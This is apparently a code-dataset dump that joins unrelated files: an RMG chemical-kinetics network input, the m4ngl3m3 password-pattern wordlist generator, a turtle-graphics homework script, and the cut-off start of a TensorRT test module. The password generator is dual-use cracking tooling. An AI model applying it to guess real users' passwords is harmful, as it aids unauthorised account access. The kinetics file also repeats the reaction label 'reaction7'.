spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (66.1011,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.70252,0.0448033,-1.90919e-05,1.71805e-09,5.4842e-13,80959.9,20.2105], Tmin=(100,'K'), Tmax=(1432.87,'K')), NASAPolynomial(coeffs=[8.99387,0.0315806,-1.27157e-05,2.22513e-09,-1.46128e-13,78138.2,-20.1434], Tmin=(1432.87,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(672.412,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(245.277,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsH) + radical(AllylJ2_triplet) + radical(AllylJ2_triplet)"""),
)
species(
label = '[CH]C(=[CH])C([CH])C(21275)',
structure = SMILES('[CH]C(=[CH])C([CH])C'),
E0 = (982.851,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,2750,2800,2850,1350,1500,750,1050,1375,1000,1380,1390,370,380,2900,435,350,440,435,1725,200,800,1000,1200,1400,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 6,
opticalIsomers = 1,
molecularWeight = (79.1198,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.794676,0.0615631,-4.67001e-05,1.85473e-08,-2.99066e-12,118332,26.1726], Tmin=(100,'K'), Tmax=(1467.14,'K')), NASAPolynomial(coeffs=[14.1607,0.025122,-9.44272e-06,1.61746e-09,-1.05816e-13,114411,-43.434], Tmin=(1467.14,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(982.851,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(291.007,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + longDistanceInteraction_noncyclic(CdCs-ST) + group(Cds-CdsHH) + radical(CCJ2_triplet) + radical(AllylJ2_triplet) + radical(Cds_P)"""),
)
species(
label = '[C]C(=[CH])C([CH2])C(21276)',
structure = SMILES('[C]C(=[CH])C([CH2])C'),
E0 = (1038.51,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2750,2800,2850,1350,1500,750,1050,1375,1000,1380,1390,370,380,2900,435,3120,650,792.5,1650,350,440,435,1725,395.001],'cm^-1')),
HinderedRotor(inertia=(0.0823483,'amu*angstrom^2'), symmetry=1, barrier=(9.04704,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0816193,'amu*angstrom^2'), symmetry=1, barrier=(9.04182,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.248242,'amu*angstrom^2'), symmetry=1, barrier=(27.3137,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 6,
opticalIsomers = 1,
molecularWeight = (79.1198,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.870208,0.061859,-5.90831e-05,2.98425e-08,-5.95954e-12,125023,24.7062], Tmin=(100,'K'), Tmax=(1223.59,'K')), NASAPolynomial(coeffs=[14.0868,0.0186511,-6.11215e-06,9.80278e-10,-6.22518e-14,121788,-41.7227], Tmin=(1223.59,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(1038.51,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(295.164,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + longDistanceInteraction_noncyclic(CdCs-ST) + group(Cds-CdsHH) + radical(Isobutyl) + radical(Cds_P) + radical(CJ3)"""),
)
species(
label = 'N2',
structure = SMILES('N#N'),
E0 = (-8.64289,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (28.0135,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(810.913,'J/mol'), sigma=(3.621,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(1.76,'angstroms^3'), rotrelaxcollnum=4.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.53101,-0.000123661,-5.02999e-07,2.43531e-09,-1.40881e-12,-1046.98,2.96747], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.95258,0.0013969,-4.92632e-07,7.8601e-11,-4.60755e-15,-923.949,5.87189], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-8.64289,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""N2""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'Ne',
structure = SMILES('[Ne]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (20.1797,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1235.53,'J/mol'), sigma=(3.758e-10,'m'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with fixed Lennard Jones Parameters. This is the fallback method! Try improving transport databases!"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ne""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'He',
structure = SMILES('[He]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (4.0026,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(84.8076,'J/mol'), sigma=(2.576,'angstroms'), dipoleMoment=(0,'De'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""NOx2018"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,0.928724], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,0.928724], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""He""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'Ar',
structure = SMILES('[Ar]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (39.348,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1134.93,'J/mol'), sigma=(3.33,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,4.37967], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,4.37967], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ar""", comment="""Thermo library: primaryThermoLibrary"""),
)
transitionState(
label = 'TS1',
E0 = (739.718,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS2',
E0 = (859.143,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS3',
E0 = (922.947,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS4',
E0 = (834.005,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS5',
E0 = (887.531,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS6',
E0 = (793.412,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS7',
E0 = (836.699,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS8',
E0 = (931.847,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS9',
E0 = (784.027,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS10',
E0 = (959.293,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS11',
E0 = (1140.79,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS12',
E0 = (996.661,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS13',
E0 = (1156.6,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS14',
E0 = (803.118,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS15',
E0 = (1186.54,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS16',
E0 = (934.483,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS17',
E0 = (899.653,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS18',
E0 = (748.002,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS19',
E0 = (1088.1,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS20',
E0 = (1194.66,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS21',
E0 = (1250.32,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
reaction(
label = 'reaction1',
reactants = ['[CH]C(=[CH])C([CH2])C(18883)'],
products = ['C=CC(42)', '[CH]=C=[CH](18734)'],
transitionState = 'TS1',
kinetics = Arrhenius(A=(5e+12,'s^-1'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Exact match found for rate rule [RJJ]
Euclidian distance = 0
family: 1,4_Linear_birad_scission"""),
)
reaction(
label = 'reaction2',
reactants = ['H(8)', '[CH]C(=[CH])C(=C)C(19687)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS2',
kinetics = Arrhenius(A=(72.1434,'m^3/(mol*s)'), n=1.66666, Ea=(10.8177,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Cds-OneDeCs_Cds;HJ]
Euclidian distance = 0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction3',
reactants = ['[CH](2815)', 'C#CC([CH2])C(5193)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS3',
kinetics = Arrhenius(A=(18.899,'m^3/(mol*s)'), n=1.76329, Ea=(16.1554,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Ct-Cs_Ct-H;YJ] for rate rule [Ct-Cs_Ct-H;CH_quartet]
Euclidian distance = 2.0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction4',
reactants = ['[CH3](11)', '[CH]C(=[CH])C=C(19261)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS4',
kinetics = Arrhenius(A=(0.0129216,'m^3/(mol*s)'), n=2.42105, Ea=(24.5119,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Cds-OneDeH_Cds;CsJ-HHH]
Euclidian distance = 0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction5',
reactants = ['C=CC(42)', '[CH][C]=[CH](21256)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS5',
kinetics = Arrhenius(A=(0.00168615,'m^3/(mol*s)'), n=2.52599, Ea=(19.6608,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Cds-CsH_Cds-HH;CJ]
Euclidian distance = 0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction6',
reactants = ['[CH2][CH]C(44)', '[CH]=C=[CH](18734)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS6',
kinetics = Arrhenius(A=(0.523563,'m^3/(mol*s)'), n=2.10494, Ea=(22.6844,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Ct_Ct;CJ]
Euclidian distance = 0
family: R_Addition_MultipleBond"""),
)
reaction(
label = 'reaction7',
reactants = ['[CH]C([CH])=C(C)C(21272)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS7',
kinetics = Arrhenius(A=(4.614e+09,'s^-1'), n=1.31, Ea=(203.342,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 163 used for R2H_S;C_rad_out_OneDe/Cs;Cs_H_out_2H
Exact match found for rate rule [R2H_S;C_rad_out_OneDe/Cs;Cs_H_out_2H]
Euclidian distance = 0
Multiplied by reaction path degeneracy 6.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction8',
reactants = ['[CH]C(=[CH])C([CH2])C(18883)'],
products = ['[CH]C([CH2])=C([CH2])C(18079)'],
transitionState = 'TS8',
kinetics = Arrhenius(A=(13437.7,'s^-1'), n=2.58467, Ea=(192.129,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R3H_DS;Cd_rad_out_singleH;XH_out]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction7',
reactants = ['[CH]C(=[CH])C([CH2])C(18883)'],
products = ['[CH]C(=C)C([CH2])[CH2](17727)'],
transitionState = 'TS9',
kinetics = Arrhenius(A=(222600,'s^-1'), n=2.23, Ea=(44.3086,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4H_DSS;Cd_rad_out_singleH;Cs_H_out] for rate rule [R4H_DSS;Cd_rad_out_singleH;Cs_H_out_2H]
Euclidian distance = 1.0
Multiplied by reaction path degeneracy 6.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction10',
reactants = ['[CH3](11)', '[CH]C([CH])=C[CH2](21258)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS10',
kinetics = Arrhenius(A=(1.66881e+08,'m^3/(mol*s)'), n=-0.401267, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;C_methyl]
Euclidian distance = 0
family: R_Recombination
Ea raised from -6.7 to 0 kJ/mol."""),
)
reaction(
label = 'reaction11',
reactants = ['[CH2][CH]C(44)', '[CH][C]=[CH](21256)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS11',
kinetics = Arrhenius(A=(1.9789e+07,'m^3/(mol*s)'), n=-0.126319, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;Y_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -15.6 to -15.6 kJ/mol.
Ea raised from -15.6 to 0 kJ/mol."""),
)
reaction(
label = 'reaction12',
reactants = ['H(8)', '[CH]C([CH])=C([CH2])C(19692)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS12',
kinetics = Arrhenius(A=(4.34078e+06,'m^3/(mol*s)'), n=0.278577, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;H_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -1.4 to 0 kJ/mol."""),
)
reaction(
label = 'reaction13',
reactants = ['H(8)', '[CH]C(=[CH])C([CH2])[CH2](19200)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS13',
kinetics = Arrhenius(A=(6.97354e-12,'cm^3/(molecule*s)'), n=0.6, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 18 used for C_rad/H2/Cs;H_rad
Exact match found for rate rule [C_rad/H2/Cs;H_rad]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: R_Recombination
Ea raised from -3.3 to 0 kJ/mol."""),
)
reaction(
label = 'reaction14',
reactants = ['[CH]C(=[CH])C([CH2])C(18883)'],
products = ['[CH]C(=C)C(=C)C(18075)'],
transitionState = 'TS14',
kinetics = Arrhenius(A=(1.4874e+09,'s^-1'), n=1.045, Ea=(63.4002,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R3radExo;Y_rad;XH_Rrad]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: Intra_Disproportionation"""),
)
reaction(
label = 'reaction15',
reactants = ['CH2(S)(14)', '[CH]C(=[CH])C[CH2](18837)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS15',
kinetics = Arrhenius(A=(143764,'m^3/(mol*s)'), n=0.444, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [carbene;R_H]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: 1,2_Insertion_carbene
Ea raised from -5.1 to 0 kJ/mol."""),
)
reaction(
label = 'reaction16',
reactants = ['[CH]C(=[CH])C([CH2])C(18883)'],
products = ['[CH]C([CH])=CCC(21273)'],
transitionState = 'TS16',
kinetics = Arrhenius(A=(5.59192e+09,'s^-1'), n=1.025, Ea=(194.765,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [cCs(-HC)CJ;CsJ;CH3] for rate rule [cCs(-HC)CJ;CsJ-HH;CH3]
Euclidian distance = 1.0
family: 1,2_shiftC"""),
)
reaction(
label = 'reaction17',
reactants = ['[CH]C(=[CH])C([CH2])C(18883)'],
products = ['[CH]C(=[CH])C[CH]C(18912)'],
transitionState = 'TS17',
kinetics = Arrhenius(A=(6.55606e+10,'s^-1'), n=0.64, Ea=(159.935,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [cCs(-HC)CJ;CsJ;C] for rate rule [cCs(-HC)CJ;CsJ-HH;C]
Euclidian distance = 1.0
family: 1,2_shiftC"""),
)
reaction(
label = 'reaction18',
reactants = ['[CH]C(=[CH])C([CH2])C(18883)'],
products = ['[CH]C1=CCC1C(21274)'],
transitionState = 'TS18',
kinetics = Arrhenius(A=(3.24e+12,'s^-1'), n=-0.305, Ea=(8.28432,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4;C_rad_out_2H;Ypri_rad_out] for rate rule [R4_SSD;C_rad_out_2H;CdsinglepriH_rad_out]
Euclidian distance = 2.2360679775
Multiplied by reaction path degeneracy 2.0
family: Birad_recombination"""),
)
reaction(
label = 'reaction19',
reactants = ['CH2(T)(28)', '[CH]C([CH])=CC(21257)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS19',
kinetics = Arrhenius(A=(1.14854e+06,'m^3/(mol*s)'), n=0.575199, Ea=(34.3157,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Y_rad;Birad] for rate rule [C_rad/H/OneDeC;Birad]
Euclidian distance = 4.0
family: Birad_R_Recombination"""),
)
reaction(
label = 'reaction20',
reactants = ['H(8)', '[CH]C(=[CH])C([CH])C(21275)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS20',
kinetics = Arrhenius(A=(1e+07,'m^3/(mol*s)'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [H_rad;Birad]
Euclidian distance = 0
family: Birad_R_Recombination"""),
)
reaction(
label = 'reaction21',
reactants = ['H(8)', '[C]C(=[CH])C([CH2])C(21276)'],
products = ['[CH]C(=[CH])C([CH2])C(18883)'],
transitionState = 'TS21',
kinetics = Arrhenius(A=(1e+07,'m^3/(mol*s)'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [H_rad;Birad]
Euclidian distance = 0
family: Birad_R_Recombination"""),
)
network(
label = '4339',
isomers = [
'[CH]C(=[CH])C([CH2])C(18883)',
],
reactants = [
('C=CC(42)', '[CH]=C=[CH](18734)'),
],
bathGas = {
'N2': 0.25,
'Ne': 0.25,
'He': 0.25,
'Ar': 0.25,
},
)
pressureDependence(
label = '4339',
Tmin = (1200,'K'),
Tmax = (1500,'K'),
Tcount = 10,
Tlist = ([1201.48,1213.22,1236.21,1269.31,1310.55,1356.92,1404.16,1447.02,1479.84,1497.7],'K'),
Pmin = (1,'atm'),
Pmax = (10,'atm'),
Pcount = 10,
Plist = ([1.02771,1.14872,1.41959,1.89986,2.67608,3.83649,5.40396,7.23219,8.93758,9.98989],'bar'),
maximumGrainSize = (0.5,'kcal/mol'),
minimumGrainCount = 250,
method = 'modified strong collision',
interpolationModel = ('Chebyshev', 6, 4),
activeKRotor = True,
activeJRotor = True,
rmgmode = True,
)
| [
"[email protected]"
]
| |
561a473b6aa704f7d0651d89278fc1942b376384 | b3528a3795ce373e27d52362128de3cff6f9969d | /python/orbs/target/password-generator/slices1589360571.263371/success/success_39_0.py | f1896f56cc09413b60c95ec2ce3c24bce6dab1fd | []
| no_license | greenmonn/daily-coding | 43e0f3775678c7d6116df7ba5034ea18489d87c9 | ef6ecc88e6db61e18364eef3ea071c11e1385a99 | refs/heads/master | 2023-01-14T04:59:14.130309 | 2021-02-08T23:32:56 | 2021-02-08T23:32:56 | 157,735,438 | 1 | 1 | null | 2022-12-21T02:13:17 | 2018-11-15T15:47:37 | Python | UTF-8 | Python | false | false | 5,253 | py | #!/usr/bin/env python3
# m4ngl3m3! v0.1.1
# Common password pattern generator using strings list
# Follow (Medium / Twitter): @localh0t
import argparse
import sys
import os
from Mangler import ManglingParameters
from Mangler import Mangler
def build_parser():
"""Add parser arguments and return an instance of ArgumentParser."""
parser = argparse.ArgumentParser(description=("Common password pattern "
"generator using strings "
"list"),
formatter_class=argparse.
ArgumentDefaultsHelpFormatter)
parser.add_argument("mutation_mode",
metavar="MUTATION_MODE",
type=str,
help=("Mutation mode to perform: "
"(prefix-mode | suffix-mode | dual-mode)"),
choices=['prefix-mode', 'suffix-mode', 'dual-mode'])
parser.add_argument("strings_file",
metavar="STRINGS_FILE",
type=str,
help="File with strings to mutate")
parser.add_argument("output_file",
metavar="OUTPUT_FILE",
type=str,
help="Where to write the mutated strings")
parser.add_argument("-fy", "--from-year",
metavar="FROM_YEAR",
type=int,
help="Year where our iteration starts",
default=2015)
parser.add_argument("-ty", "--to-year",
metavar="TO_YEAR",
type=int,
help="Year where our iteration ends",
default=2020)
parser.add_argument('-sy', "--short-year",
help=("Also add shorter year form when iterating"),
action='store_true',
default=False)
parser.add_argument("-nf", "--numbers-file",
metavar="NUMBERS_FILE",
type=str,
help="Numbers prefix/suffix file",
default='./target/password-generator/files/numbers/numbers_set2.txt')
parser.add_argument("-sf", "--symbols-file",
metavar="SYMBOLS_FILE",
type=str,
help="Symbols prefix/suffix file",
default='./target/password-generator/files/symbols/symbols_set2.txt')
parser.add_argument("-cf", "--custom-file",
metavar="CUSTOM_FILE",
type=str,
help="Custom words/dates/initials/etc file")
parser.add_argument('-sbs', "--symbols-before-suffix",
help=("Insert symbols also before years/numbers/"
"custom (when in suffix-mode or dual-mode)"),
action='store_true',
default=False)
parser.add_argument('-sap', "--symbols-after-prefix",
help=("Insert symbols also after years/numbers/custom"
" (when in prefix-mode or dual-mode)"),
action='store_true',
default=False)
parser.add_argument("-mm", "--mutation-methods",
metavar="MUTATION_METHODS",
default='normal,'
'uppercase,'
'firstup,'
'replacevowels')
return parser
def build_mangler_with_args(args):
parameters = ManglingParameters()
parameters.num_file = open(args.numbers_file, 'r').read().splitlines()
parameters.sym_file = open(args.symbols_file, 'r').read().splitlines()
if (args.custom_file):
parameters.cus_file = open(args.custom_file, 'r').read().splitlines()
parameters.mutation_mode = args.mutation_mode
parameters.from_year = args.from_year
parameters.to_year = args.to_year
parameters.suffix_pos_swap = args.symbols_before_suffix
return Mangler(mangling_parameters=parameters)
if __name__ == "__main__":
args = build_parser().parse_args()
mangler = build_mangler_with_args(args)
mangler_functions = {
"normal": mangler.normal_mangling,
"uppercase": mangler.uppercase_mangling,
"firstup": mangler.firstup_mangling,
"replacevowels": mangler.replacevowels_mangling,
}
written_strings = 0
with open(args.strings_file, 'r') as f:
for line in f:
mangled = []
for method in args.mutation_methods.lower().split(","):
try:
(name, output) = mangler_functions[method](line.strip())
mangled.extend(output)
except KeyError:
print("[-] The method %s is not defined !" % method)
print("[+] %s mutation method done on string: %s" %
(name, line.strip()))
written_strings += len(mangled)
print('##v_trajectory captured: {}##'.format(written_strings))
| [
"[email protected]"
]
| |
e382659fe44a65b3a060e2c0d9cb78015fd0bea2 | 28436c3e8d5f59f9011bfac7fcdef977c345aa7b | /2021-05-15/homework1.py | 960425e000fa70c2621ff185c6e2e587beb46b6b | []
| no_license | engeeker/python-for-kid-2021 | 533d7b54ef23d99727642ba7a119e0a46577651b | 783d3582c6e9009c23213378650160f7dc937409 | refs/heads/main | 2023-08-02T15:18:17.367567 | 2021-10-01T13:15:56 | 2021-10-01T13:15:56 | 347,414,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | import turtle
import random
p = turtle.Pen()
color_list = ['red', 'yellow', 'blue', 'green']
p.speed(0)
turtle.bgcolor('black')
p.color(random.choice(color_list))
for i in range(200):
p.forward(i * 2)
p.left(91)
turtle.Screen().exitonclick() | [
"[email protected]"
]
| |
4a07ea84d52063b402726d57dbdf3727faf67046 | b09584e81194e40070d320c763856d6b0721935f | /tools/Polygraphy/tests/backend/trt/test_loader.py | 74ddfb66e8dcb83df156387239bb16de0286f81a | [
"BSD-3-Clause",
"Apache-2.0",
"ISC",
"BSD-2-Clause",
"MIT"
]
| permissive | MarkMoTrin/TensorRT | c7a46a5877b4a0687ffe2b694515e7fc923d0443 | 7f269a7e6a62f555100d9b72afb9977e702ad488 | refs/heads/main | 2023-09-05T13:08:58.048025 | 2021-10-19T08:23:08 | 2021-10-19T17:25:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,003 | py | #
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import contextlib
import sys
import pytest
import tensorrt as trt
from polygraphy import constants, mod, util
from polygraphy.backend.trt import (
Calibrator,
CreateConfig,
EngineBytesFromNetwork,
EngineFromBytes,
EngineFromNetwork,
LoadPlugins,
ModifyNetworkOutputs,
NetworkFromOnnxBytes,
Profile,
SaveEngine,
bytes_from_engine,
engine_from_network,
modify_network_outputs,
network_from_onnx_bytes,
network_from_onnx_path,
onnx_like_from_network,
)
from polygraphy.comparator import DataLoader
from tests.helper import get_file_size, is_file_non_empty
from tests.models.meta import ONNX_MODELS
##
## Fixtures
##
@pytest.fixture(scope="session")
def identity_engine():
network_loader = NetworkFromOnnxBytes(ONNX_MODELS["identity"].loader)
engine_loader = EngineFromNetwork(network_loader, CreateConfig())
with engine_loader() as engine:
yield engine
@pytest.fixture(scope="session")
def identity_builder_network():
builder, network, parser = network_from_onnx_bytes(ONNX_MODELS["identity"].loader)
with builder, network, parser:
yield builder, network
@pytest.fixture(scope="session")
def identity_network():
builder, network, parser = network_from_onnx_bytes(ONNX_MODELS["identity"].loader)
with builder, network, parser:
yield builder, network, parser
@pytest.fixture(scope="session")
def identity_identity_network():
